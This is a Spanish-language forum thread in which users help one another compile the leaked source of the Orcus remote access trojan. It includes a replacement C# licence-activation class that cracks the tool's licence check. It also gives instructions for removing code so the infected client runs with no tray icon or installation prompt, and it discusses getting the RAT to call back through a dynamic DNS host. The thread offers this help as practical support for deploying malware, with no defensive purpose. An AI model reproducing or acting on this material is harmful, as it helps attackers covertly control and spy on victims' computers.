Orcus es un RAT en C#
Hace unos meses se robaron las fuentes y las liberaron
[Enlace externo eliminado para invitados]
Imagen

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
Ahí lo compile pero tengo problemas cuando ejecuto el binario me pide la licence key y no se como obtenerla 
para compilar bien simple 
- Set the build option to `Release`
- Press Ctrl + Shift + B to build the complete solution (do this until it does nothing if you build)
- Set the build option back to `Debug`
- Press Ctrl+ Shift + B again
eso es todo no debería tirar ningún error 

 
Vaya a: Orcus.Administration.OrcusActivator.cs
Reemplace el código con este y recompile.  
Cree un archivo license.orcus vacío en la misma carpeta que exe .
Hecho.

Código: Seleccionar todo

using System;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using Orcus.Administration.Core.Utilities;
using Orcus.Administration.Licensing;

namespace Orcus.Administration
{
    public class OrcusActivator
    {
        private const string PublicKey =
            @"<RSAKeyValue><Modulus>0kOe1lvzBhDWD7k2rj9GeMyJt7drGCJByVl++DIX8oTd4eDXpBEsnmXYwheFk9DLPDBZzrq0GiHzaSsCYxcz2vwT+eM4UXMZux+lRx2fvgLv5ga1r+FC+DgF7CkKGZ2AeIGJYgN+cjMn0qBLp83QRJ69tzUDMfaOvA5VDDN5NzM=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>";

        protected OrcusActivator()
        {
            HardwareId = HardwareIdGenerator.HardwareId;
            IsValid = true;
            IsRegistered = true;
        }

        public static bool IsRegistered { get; set; }
        public bool IsValid { get; }
        public string HardwareId { get; }

        private bool ValidateLicense(byte signature)
        {
            var dataStr = GeneralizeDataString(HardwareId); // "ERIKAMUSTERMANN"

            var dataBuffer = Encoding.UTF8.GetBytes(dataStr);

            using (var provider = new RSACryptoServiceProvider())
            {
                provider.FromXmlString(PublicKey);
                provider.PersistKeyInCsp = false;

                return provider.VerifyData(dataBuffer, new SHA1CryptoServiceProvider(), signature);
            }
        }

       public static OrcusActivator Parse(string licenseData)
        {
            return new OrcusActivator();
        }

        private static byte DecodeDataFromString(string value)
        {
            if (value == null)
                return new byte[0];

            if ((value.Length & 1) != 0)
                throw new FormatException();

            if (string.IsNullOrWhiteSpace(value))
                return new byte[0];

            value = value.ToUpperInvariant();

            byte ab = new byte[value.Length >> 1];
            for (int i = 0; i < value.Length; i++)
            {
                int b = value[i];
                b = b - '0' + ((('9' - b) >> 31) & -7);
                ab[i >> 1] |= (byte) (b << 4*((i & 1) ^ 1));
            }
            return ab;
        }
        private static string GeneralizeDataString(string someString)
        {
            return someString.StripWhiteSpace().ToUpperInvariant();
        }
    }
}
Se supone que esto soluciona el problema de licencia, yo ni siquiera puedo compilarlo con los pasos que pusiste, probaré con otro pc que tengo me resulta raro que compilando en release no pare de tirarme errores. 😓
Esa solución que pegaste arriba seria la definitiva pero por el momento no me funciona como debería 
Reemplazando el código y recompilando despues abris la carpeta y creas por ejemplo con un bloc de notas un archivo vacío y lo renombras como "license.orcus"
recién lo pude ejecutar pero solo me conecta a la ip local no hay forma que conecte con el dns. 

Mostrar/Ocultar

Siryu escribió: 28 Dic 2021, 12:07

Se supone que esto soluciona el problema de licencia, yo ni siquiera puedo compilarlo con los pasos que pusiste, probaré con otro pc que tengo me resulta raro que compilando en release no pare de tirarme errores. 😓
 
 
revisa si tenés actualizado y con todas las dependencias el visual studio primero lo compilas en  release y después en debug  ahora veo de subir el proyecto compilado y con la solución de la licencia a ver si alguien le encuentra la vuelta a la conexión por dns 
 
 
 

Mostrar/Ocultar

Aquí dejo el proyecto ya compilado y con la supuesta solución de la key 

Mostrar/Ocultar

Pass: indetectables.net
Si alguien soluciona el problema de la conexión que explique como hizo----  Saludos!

Edito..
Agrego información relevante "¿Cómo podemos ocultar el icono de la bandeja?
Debe comentar (o eliminar) cuatro líneas de código: de Orcus.Program.cs es "Application.Run (new MainForm (client));" y "if (new InstallationPromptForm (). ShowDialog ()! = DialogResult.OK)" y justo después de esa línea está el "retorno;". Luego, desde Orcus.OrcusApplicationContext.cs es "ShowWindow ();". Eso es todo, reconstruya la solución, cree un nuevo cliente, debería estar oculto ahora. Probablemente haya una forma mejor y más hábil de hacer esto, ya que el creador original, Sorzus, había creado un complemento (llamado OrcusPatcher) para versiones posteriores que hace esto (y probablemente más), sin embargo, el complemento no funciona en esta versión y no se abrirá en dnSpy, así que hasta que lea más de esta fuente sobre la creación de complementos, esta es la solución rápida de invisibilidad."

Esto lo copie del foro de donde salió todo esto la traduccion es de google. Finalmente pude ocultar el icono de bandeja pero no logro que conecte con el no-ip solo con la ip local 😭
Responder

Volver a “Troyanos y Herramientas”